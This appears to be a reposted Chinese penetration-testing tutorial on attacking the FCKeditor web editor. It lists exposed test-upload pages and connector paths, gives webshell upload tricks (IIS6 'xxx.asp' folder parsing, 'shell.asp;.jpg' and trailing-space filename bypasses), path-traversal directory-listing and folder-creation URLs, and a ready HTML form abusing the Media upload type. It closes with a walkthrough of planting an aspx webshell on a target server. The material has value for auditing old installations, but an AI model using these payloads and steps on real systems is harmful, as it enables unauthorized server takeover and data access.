FCKeditor編輯器漏洞

FCKeditor編輯器是一款強大的所見即所得文本編輯器，現(xiàn)在已經(jīng)更名為：CKEditor

一、fckeditor的常見敏感目錄（FCK有時要小寫）

(1) 查看版本信息

• 1 ---- /FCKeditor/editor/dialog/fck_about.html
• 2 ---- /FCKeditor/_whatsnew.html
  
  

(2) 默認上傳頁面

• FCKeditor編輯器默認會存在：test.html 和 uploadtest.html文件，直接訪問這些文件可以獲取當前文件夾文件名稱 以及 上傳文件。下面有五個常見的默認上傳頁面，在實戰(zhàn)中可以進行嘗試。

• 1 ---- /FCKeditor/editor/filemanager/browser/default/browser.html ---- 在這個頁面上傳文件總是沒有反應，并且無法新建目錄
  
  貌似是只有管理員權限才能新建目錄
  

• 2 ---- /FCKeditor/editor/filemanager/browser/default/connectors/test.html
  
  上傳成功之后訪問：/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ 可以看到xml格式的數(shù)據(jù)
  

• 3 ---- /FCKeditor/editor/filemanager/upload/test.html
  
  上傳之后提示：沒有錯誤
  
  并且提示了上傳的文件在：/UserFiles/apple.aspx中
  

• 4 ---- /FCKeditor/editor/filemanager/connectors/test.html

• 5 ---- /FCKeditor/editor/filemanager/connectors/uploadtest.html
  

(3) 連接器

• /FCKeditor/editor/filemanager/connectors/aspx/connector.aspx
• /FCKeditor/editor/filemanager/connectors/asp/connector.asp
• /FCKeditor/editor/filemagager/connectors/php/connector.php

(4) 示例上傳地址

• 1 ---- /FCKeditor/_samples/default.html
• 2 ---- /FCKeditor/editor/fckeditor.html
  
• 3 ---- /FCKeditor/editor/fckdialog.html
  回顯undefined，沒有定義
  

二、常見利用方式

(1) windows 2003 + IIS6 文件解析路徑漏洞
通過fckeditor在文件上傳頁面中，創(chuàng)建 xxx.asp 文件夾，在 xxx.asp 文件夾下上傳一個名為 xxx.jpg 的圖片后綴名webshell文件，即可獲取到其shell

(2) 突破文件名限制

• 1、重復上傳同名文件，繞過："." 變?yōu)?“-” 的限制
  • 某些版本的FCK上傳shell.asp;.jpg 會變?yōu)?shell_asp;.jpg，繼續(xù)上傳 shell.asp;.jpg 就會變成：shell.asp;(1).jpg
• 2、提交shell.php + 空格繞過文件名限制 ---- 只對windows系統(tǒng)有效

(3) 列目錄

• 示例上傳地址：/FCKeditor/editor/fckeditor.html 不可以上傳文件，可點擊上傳圖片按鈕，再選擇瀏覽服務器即可跳轉到可上傳文件頁，可查看已經(jīng)上傳的文件（前提是/FCKeditor/editor/fckeditor.html 頁面存在）
• 根據(jù)xml返回信息查看網(wǎng)站目錄

http://***.1**.***.***:8081/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp

• 獲取當前文件夾

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

• 瀏覽E盤文件

/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/

(4) 修改Media類型進行上傳
FCKeditor 2.4.2 for php以下的版本在處理php上傳的地方?jīng)]有對Media類型進行上傳文件類型的控制，導致用戶可以上傳任意文件，上傳文件的表單如下所示（將其用瀏覽器打開即可），action為實際上傳的地址

<form id="fileupload" enctype="multipart/form-data" action="http://xxx.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload file:<br /> <input type="file" name="newfile"> <input id="submit" type="submit" value="Upload"> </form>

三、實戰(zhàn)

這里的目標服務器存在FCKeditor漏洞。FCKeditor的版本是：2.4.3


文件上傳頁面在：/fckeditor/editor/filemanager/upload/test.html

使用的語言是asp.net，這里上傳一個aspx的大馬文件

上傳成功之后顯示文件在/UserFiles/目錄下，到該文件夾下可以找到該文件

點擊之后輸入用戶名和密碼即可連接，上傳的是一個類似powershell的大馬文件

getshell成功

---

這里還有另外一種getshell的方法，訪問：/fckeditor/editor/fckeditor.html ---- 可以到示例上傳地址頁面，點擊下面的上傳圖片按鈕

在點擊Link，瀏覽服務器可以到文件上傳頁面

文件上傳頁面

新建文件夾

在這里可以上傳文件

總結

以上是生活随笔為你收集整理的【渗透测试】--- FCKeditor文本编辑器漏洞的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內容還不錯，歡迎將生活随笔推薦給好友。